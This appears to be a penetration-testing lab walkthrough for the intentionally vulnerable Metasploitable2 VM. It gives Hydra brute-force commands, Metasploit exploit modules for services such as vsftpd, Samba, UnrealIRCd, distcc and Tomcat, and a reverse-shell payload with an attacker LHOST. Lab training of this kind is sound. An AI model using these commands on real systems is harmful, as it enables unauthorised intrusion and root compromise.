Metasploitable2

Metasploitable2 Complete Overview

Metasploitable is an intentionally vulnerable Linux virtual machine.

This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques.

Installation and configuration

We are here to exploit Metasploitable 2 (Damn vulnerable machine for penetration testing)

Get this Metasploiable2 machine from https://information.rapid7.com/download-metasploitable-2017.html

Installation Process:

1. Open VirtualBox and Click on “New” button to create a new virtual machine
2. Type the Virtual Machine name(Metasploitable2)
3. Allocate the amount of memory(Preferable but not below 512mb)
4. Select Use an existing hard disk file
5. Select the vmdk file that you have downloaded from Rapid7
6. Click on Create…!!! Successfully Installed Metasploitable2, Now it’s time to configure network settings.

After installation change the network adapter settings as follows :

In-Network Setting: Settings/Network/Adapter Select Ethernet or Wireless

In Advanced tab Select: Promiscuous Mode as Allow All

Bootup the Metasploitable2 machine and Try to login using given credentials on Banner…!!!

Find machine IP address by using the following command in terminal

ifconfig

That’s All for setup….Let’s Start Hacking…

Walkthrough

Scanning

Scanning the Matasploitable 2

As we noticed the IP address of the machine is 192.168.0.130

Let’s begin scanning with Nmap which is part of Kali Linux

nmap -sV -p- 192.168.0.130

Exploiting all ports in different techniques :

21-FTP

Method 1:

Login with Anonymous as username and no password.

If you need more info about Anonymous FTP you can find it here.

https://whatis.techtarget.com/definition/anonymous-FTP-File-Transfer-Protocol

ftp 192.168.0.130

Method 2 :

Through Brute-force using Hydra but you need to have a custom list of usernames and passwords.

hydra -L /root/Desktop/USERNAMES.txt -P /root/Desktop/PASSWORDS.txt <Target IP Address> ftp -V

It will take each username and password from the given files and try to login to the target FTP service.

Once you found the credentials you can directly log in.

After login to a user account, You can get root access by doing Privilege escalation.

Method 3 :

Exploiting FTP through Metasploit framework

open Metasploit framework console and search for vsftpd Backdoor exploit

msfconsole
Search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor

show options

set RHOSTS 192.168.0.130 --> <target IP address>exploit

Congratulations you got root access

22-SSH

Secure Shell (SSH) is a cryptographic network protocol for operating network services securely over an unsecured network.

Exploiting SSH in Different Techniques

Method 1

Cracking Username and password with Hydra

Hydra is an inbuilt tool in Kali-Linux used to Brute force attack is a trial and error method used by application programs to decode encrypted data such as passwords or Data Encryption Standard (DES) keys, through exhaustive effort (using brute force) rather than employing intellectual strategies.

hydra -L <Usernames_List> -P <Passwords_List> <Target ip address> <Service>

Method 2

Open Metasploit framework

Open terminal and type these commands :

service postgresql start
msfconsole
search ssh_login
use auxiliary/scanner/ssh/ssh_login

set this auxiliary and see what it requires.

set RHOSTS <target IP Address> --> in my case 192.168.0.130

Set predefined Usernames list and Passwords List

set USER_FILE <Username file Path>
set PASS_FILE <Password file Path>
exploit

It will take time-based your usernames and passwords List and It will Notify with username: password and login with those credentials.

ssh username@targetipaddress

You have user access, can’t perform all the tasks so try to get root access by doing Privilege escalation.

23-TELNET

Telnet is a simple, text-based network protocol that is used for accessing remote computers over TCP/IP networks like the Internet. Telnet was created and launched in 1969 and, historically speaking, you can say that it was the first Internet.

telnet <target IP Address> --> 192.168.0.130

By default it will Grab Metasploitable 2 banner, it shows that Login with msfadmin/msfadmin to get a start. Just enter those credentials you are in.

25-SMTP

SMTP is part of the application layer of the TCP/IP protocol. Using a process called “store and forward,” SMTP moves your email on and across networks. It works closely with something called the Mail Transfer Agent (MTA) to send your communication to the right computer and email inbox.

Method 1:

Using Metasploit

Start the Metasploit by executing the commands

service postgresql start
msfconsole -q
search smtp_version

use auxiliary/scanning/smtp/smtp_version (or) you can type use 0
show options
set RHOST 192.168.0.130
exploit  (or)  run
show options
set RHOST 192.168.0.130
exploit  (or)  run

SMTP stands for Simple Mail Transport Protocol and is a server-to-server protocol and keeps a local database of users to which it must send and receive emails.

SMTP has a set of commands. We’re going to connect to our target with “netcat” through port 25 and try to acquire this database emails.

Open a new terminal and type:

nc 192.168.0.130 25

Now the connection is established you can verify by the “SMTP” commands

Type: vrfy user

vrfy (This is a non-interactive shell)

For SMTP Commands Visit: http://www.tcpipguide.com/free/t_SMTPCommands-2.htm

Method 2

Using smtp_enum

This is can be done by Metasploit

search smtp_enum

use auxiliary/scanner/smtp/smtp_enum

show options
set RHOST 192.168.0.130
exploit

This method is using enumeration to find out this list of users in the SMTP service.

Later NetCat can be helpful to get a reverse connection with that user.

139&445 Netbios-SSN

Samba is an open-source project that is widely used on Linux and Unix computers so they can work with Windows file and print services.

We can even use Samba as an Active server to handle login, authentication and access control for a Windows network.

Search for exploit

use exploit/multi/samba/usermap_script

To view the options for the exploit

show options
Set RHOST192.168.0.130 (Target IP address)

Set the payload

Show payloads
Set payload cmd/unix/reverse

Set required arguments for payload

Show options
Set LHOST 192.168.0.109 (Attackers IP Address)
Set LPORT 4444

Check once all required arguments are filled

exploit

1099–Java-RMI

Remote Method Invocation (RMI) is an API that allows an object to invoke a method on an object that exists in another address space, which could be on the same machine or a remote machine.

Exploiting java-RMI-server

search for the exploit

search java_rmi_server

Choose the exploit according to their rank. for instance, “excellent” works better than “normal”.

use exploit/multi/misc/java_rmi_server
show options
set RHOSTS <target's IP>
exploit

We got access to the target machine.

1524-BINDSHELL

Bind shell is a type of shell in which the target machine opens up a communication port or a listener on the victim machine and waits for an incoming connection. The attacker then connects to the victim machine’s listener which then leads to code or command execution on the server.

Exploitation

It is a root shell so we can connect through netcat service.

nc <target ip address> 1524

Congratulations, You are a root user now.

2121-ProFTPD

Before exploiting this port you need to have login credentials so as we know the method get it through Brute-force technique, We can access ProFTPd with telnet, We are using here user: user.

telnet <Taget IP Address> <Port Number>
USER <username>
PASS <password>

It is a normal user, Try Privilege Escalation to gain root control.

3306-MYSQL

Method 1:

search for the exploit

search scanner/mysql/mysql_login

use auxiliary/scanner/mysql/mysql_login

Sometimes there might be a chance of having a blank password for MySQL. So we can exploit it directly.

Note: by default, it shows BLANK_PASSWORDS as false, set it to true.

set BLANK_PASSWORDS as true

Method:2

In this method, we are going to exploit MySQL by using this command providing the username as root and target’s IP.

mysql -u root -h <target's IP>

3632-DISTCCD

Distcc is a tool for speeding up the compilation of source code by using distributed computing over a computer network. With the right configuration

distcc can dramatically reduce a project’s compilation time

Exploiting port 3632 using distcc-exec

Open msfconsole and search for distcc_exec

search distcc_exec
show options

Set required arguments to exploit

set RHOSTS <target-ip>
exploit

We got Shell Access…try to do privilege escalation for Higher privilege

5432-Postgresql

Exploiting PostgreSQL with postgre_payload

Open msfconsole & search for postgres_payload

search postgres_payload
use exploit/linux/postgres/postgres_payload
show options

Set required arguments for exploit

set RHOSTS <target-ip>

By default, it will use username as postgres

exploit

Successfully logged in postgresql…Let’s get a shell for doing more stuff…

Try to do privilege escalation…Happy learning..!!!

5900-VNC

Open msfconsole and search for exploit vnc_login

search vnc_login
use auxiliary/scanner/vnc/vnc_login

show options
set RHOSTS <targets IP>
set PASS_FILE <filepath that contains passwords>
run (or) exploit

This method is used to exploit VNC software hosted on Linux or Unix or Windows Operating Systems with authentication vulnerability.

Try to connect vnc with that password

Open Vnc Viewer in Terminal & Type the IP address and connect

a login prompt popup and ask to provide credentials

Then Enter the password and click OK.

Voilaaa…!!! you got Access…I know what are you thinking right Now..Don’t mess with the things around..Happy Learning.

6000-X11

The X Window System (aka X) is a windowing system for bitmap displays, which is common on UNIX-based operating systems. X provides the basic framework for a GUI based environment.

The remote X11 server accepts connections from anywhere one can get an Internet connection. It is responsible for access to the graphics cards, the input devices, and the display screen on either computer or wireless device.

Exploiting port 6000 using ssh

ssh -X -l msfadmin 192.168.0.122

In the above command ‘X’ enables all ports forwarding, by providing username and target’s IP gives us the shell

6667 & 6697 UnrealIRCD

UnrealIRCd is an Open Source IRC Server, serving thousands of networks since 1999. It runs on Linux, OS X, and Windows

UnrealIRCd is a highly advanced IRCd with a strong focus on modularity, an advanced and highly configurable configuration file. Key features include SSL

UnrealIRCd is one of the most popular and full-featured IRC daemons and is used on the largest number of IRC servers

This server is described as having possibly the most security features of any IRC server.

Protocols used: Internet Relay Chat

Let’s Exploit this IRC Server.

Method 1: on port 6667

search unrealircd
use exploit/unix/irc/unreal_ircd_3281_backdoor
show options

Set the required arguments for exploit

set RHOSTS <target-ip>

by default 6667 port number is assigned to exploit

run (or) exploit

Heyyy…We got root…We are living on the edge…

Method 2: On port 6697

Use above exploit and set the required arguments

• This time set port as 6697

set RHOSTS <target-ip>
set RPORT 6697

And Second time also we got root…Try to Exploit this…Happy learning

8180-TOMCAT

Apache Tomcat is an open-source implementation of the Java Servlet, JavaServer Pages, Java Expression Language, and WebSocket technologies. Tomcat provides a “pure Java” HTTP web server environment in which Java code can run.

Exploiting Apache-Tomcat

It can be completed in two steps:

Open msfconsole & search for tomcat_mgr_login

search tomcat_mgr_login
set RHOSTS <target-ip>

show options

Exploit will assign default usernames & passwords lists. After setting the arguments to exploit Type exploit (or) run

run

Take the same username and password and give it to the next exploit.

search for tomcat manager exploits

search tomcat_mgr_upload
use exploit/multi/http/tomcat_mgr_upload
show options

Set RHOSTS, RPORT, and HttpPassword, HttpUsername which we got from tomcat login exploit and then run the exploit.

msfconsole could assign the suitable payload for an exploit, That’s why we got meterpreter…

8787-Ruby-drb

dRuby is a distributed object system for Ruby. It is written in pure Ruby and uses its protocol.

No addon services are needed beyond those provided by the Ruby run time, such as TCP sockets.

search drb_remote_codeexec

Set the required arguments to exploit

show options
set RHOSTS <target-ip>
exploit (or) run

Congratulations you got root shell access…try to use some shell commands.